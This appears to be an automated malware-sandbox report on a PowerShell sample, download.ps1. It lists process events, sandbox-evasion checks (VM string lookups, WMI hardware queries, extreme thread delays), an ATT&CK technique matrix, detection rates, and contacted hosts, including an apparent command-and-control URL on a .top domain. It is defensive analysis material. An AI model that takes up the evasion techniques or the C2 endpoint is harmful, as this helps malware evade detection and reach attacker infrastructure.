Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB6CAAD sldt word ptr [ecx-47h]0_2_00007FFD9BB6CAAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5471Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4350Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1896922208.000001A1D8D16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine!",
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine`S
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
131
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager131
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps111%ReversingLabs
download.ps113%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
172.217.19.228
truefalse
    high
    cmacnnkfbhlcncm.top
    45.61.136.138
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://cmacnnkfbhlcncm.top/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527false
        unknown
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://www.google.com/logos/doodles/2024/rise-of-the-half-moon-december-6753651837110600-2xa.gifpowershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://schema.org/WebPagepowershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C2CD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C2E6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C3002000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://0.google.com/powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schema.org/WebPageXpowershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/powershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.google.compowershell.exe, 00000000.00000002.1849552252.000001A1C20CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/logos/doodlepowershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://apis.google.compowershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C22FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1849552252.000001A1C0971000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
